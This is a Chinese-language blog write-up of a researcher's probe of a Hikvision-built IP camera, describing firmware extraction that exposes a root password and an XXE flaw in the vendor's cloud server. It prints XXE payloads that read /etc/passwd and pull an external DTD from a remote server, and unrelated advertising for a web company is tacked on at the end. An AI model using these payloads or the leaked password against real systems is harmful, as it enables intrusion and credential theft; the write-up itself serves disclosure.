物聯網發展和安全威脅總是如影隨形。兩個月前,我想研究一下網絡攝像機,然后就在亞馬遜上購買了一個比較便宜的,由??低暣どa的Elisa Live 720p HD IP Camera。當我在破解Elisa攝像機嘗試獲取密碼信息的過程中,卻偶然發現了??低曔h程系統的一個XML外部實體注入漏洞(XXE)。
1 研究開始XXE Injection即XMLExternal Entity Injection,也就是XML外部實體注入攻擊,漏洞是在對非安全的外部實體數據進?行處理時引發的安全問題。在XML1.0標準里,XML文檔結構?定義了實體(entity)這個概念。實體可以通過預定義在文檔中調用,實體的標識符可訪問本地或遠程內容。如果在這個過程中引入了”惡意”源,在對XML文檔處理后則可能導致信息泄漏等安全問題。具體可參考TSRC-XXE漏洞攻防。
通常來說,大多網絡攝像機數據要被上傳到其后臺系統中,也就是說,只有利用網頁或者app通過其云服務平臺才能訪問攝像機。我通過攝像機以太網接口把其連接到實驗室環境,進行網絡流量監聽。因為一些設備內置了老舊或不安全的固件,所以如果想做物聯網設備相關的實驗,強烈建議不要急于把設備接上互聯網。
從Wireshark抓包流量中發現了幾個有意思的數據包:
(1)兩個未加密的請求調用:
(2)向網站www.hik-online.com發起POST請求的base64加密數據包(后作分析)
(3)從Amazon S3存儲中下載更新的Get請求:
利用Nmap掃描攝像機,發現了一些開放端口服務,其中包括一個登錄頁面,經嘗試,一些??低暢S玫哪J用戶名和密碼組合無法正確登錄。后來發現,密碼驗證的控制器受http摘要認證機制保護,這是該固件獨有的特點。利用binwalk和hiktools對固件進行分析后,雖然沒發現任何摘要認證信息,卻提取到了一些有意思的東西,如/etc/passwd文件和其中的root密碼hiklinux:
對固件進行升級之后,攝像機的SSH端口就變為關閉狀態了,所以我沒法利用這個點,只能嘗試其它途徑。
3 發現XXE漏洞回到向www.hik-online.com發起請求的數據包,它是一個Base64編碼的POST字符串,解碼之后是一堆亂碼,當然,攝像機用來驗證服務器的密碼可能就在固件中,只是需要時間去分析發現。然而,我從??低暰W站上無意發現了這個:
如果發現任何漏洞,請聯系HSRC@hikvision.com,請勿對外公開漏洞細節。
這是一個漏洞懸賞項目,好吧,讓我們來研究研究它的POST請求。由于這是一個XML POST請求,我首先嘗試用SYSTEM entity方法來讓遠程網站引用本地實體文件,如:
<?xml version=”1.0”?>
<!DOCTYPE netspi [<!ENTITY a SYSTEM“file:///etc/passwd” >]>
<c>&b;</c>
但該方法并不奏效,于是,我利用VPS遠程傳入引用實體,成功了!
<?xml version=”1.0”?>
<!DOCTYPE netspi [<!ENTITY a SYSTEM“http://www.xxx.com/test.dtd” >]>
<c>&b;</c>
圖:載入外部實體成功
!這就有意思了,既然我們可以使用SYSTEM entity方式加載引用外部實體,就可以通過惡意dtd文件調用回傳其它網站文件,如/etc/hosts文件等。所有這些過程都可以通過一個好用的自動化工具XXEinjector來完成:
OK,我可以遠程讀取網站上的任意文件,包括etc/shadow文件,當然也就獲取了這臺服務器的root權限。而且,??低暦植荚谌虻钠渌?/span>API服務器同樣存在該XXE漏洞,最終,如果獲得了這些遠程服務器權限,甚至連shodan上可搜索的大量網絡攝像機都面臨安全風險。
768網絡即將上線啦,只因有你,未來的網絡更精彩768網絡是龍巖市藍海信息技術有限公司前身,未來網絡團隊歷時八年之久項目開發,以高精尖技術壓縮建站成本,以超低價甚至免費享受高端體驗。768網絡的目標!讓每個企業、個體戶、個人擁有自己的網絡名片,網上門頭!讓價格不再是阻礙的門檻!768網絡定于2018年8月8日準時上線,現面向社會各界招收代理商,一起打造網絡轉...
陳氏商城于2015年度曾測試試上線運營,因其處于互聯網+的轉型區,跟不上時代的發展,本公司龍巖市藍海信息技術有限公司成立三年之際,2018年到來之際,載著夢想與希望,我們再次起航,希望與廣大客戶朋友們精誠合作,開創未來新輝煌! 陳氏商城項目團隊已在進行最后的相關測試,涉及穩定性,安全性、壓力線程等測試,俗稱黑白盒測試,敬請期待陳氏商城的再次到來。項目研發歷...